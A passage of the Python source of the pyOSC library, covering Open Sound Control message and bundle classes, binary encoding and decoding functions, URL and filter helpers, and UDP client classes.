ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support fon numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
from __future__ import print_function
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
if sys.version_info[0] > 2:
long = int
from socketserver import UDPServer, DatagramRequestHandler, ThreadingMixIn, StreamRequestHandler, TCPServer
try:
from socketserver import ForkingMixIn
except ImportError:
ForkingMixIn = ThreadingMixIn
else:
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retreiving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = bytes()
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == dict:
argument = list(argument.items())
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if isinstance(argument, (tuple, list)):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(list(self.values())))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(list(self.values()))
if type(values) == tuple:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
# print(self.getBinary().decode())
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = list(self.values())
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in list(self.values()))
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return list(self.values())[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = list(self.items())
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = list(values.items())
elif type(values) == list:
items = []
for val in values:
if type(val) == tuple:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == tuple:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = list(self.items())
new_items = self._buildItemList(val)
if type(i) != slice:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = list(self.items())
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return list(self.values()).count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return list(self.values()).index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = list(self.items()) + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = list(self.items())
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = list(self.items())
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = list(self.items())
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = list(self.items())
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(v))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(list(self.values()))
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(list(self.items()))
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objectss are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in list(self.values()):
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsuated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == dict:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
# print(decoded)
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
# print("Bundle binary:", self.getBinary())
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
if sys.version_info[0] > 2:
next = bytes(next.encode("UTF-8")) # this could be the problem?
else:
next = str(next)
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), next)
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in (bytes, str):
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next) # TODO RYAN
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', int(secs), int(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
#length = string.find(data,"\0")
#length = str(data).find("\x00")
length = data.index(b"\x00")
nextData = int(math.ceil((length+1) / 4.0) * 4)
output = (data[0:length].decode(), data[nextData:])
return output
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (int(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","): #.encode("utf-8")):
for tag in typetags[1:]:
# print(tag, rest)
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == int:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in str and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = cmp(self.socket._sock, other.socket._sock)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return cmp(self.server, other.server)
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in str:
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in list(filters.keys()):
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in list(filters.values()):
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in list(filters.items()):
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
if sys.version_info[0] > 2:
OSCtrans = str.maketrans("{,}?","(|).")
else:
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
if type(pattern) is bytes:
pattern = pattern.decode()
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in list(self.targets.keys()):
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in list(src.keys()): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in list(src.items()):
if (addr in list(dst.keys())) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in list(self.targets.keys()):
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in str:
(_, filters) = parseFilterStr(filters)
elif type(filters) != dict:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in str:
address = self._searchHostAddr(address)
elif (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
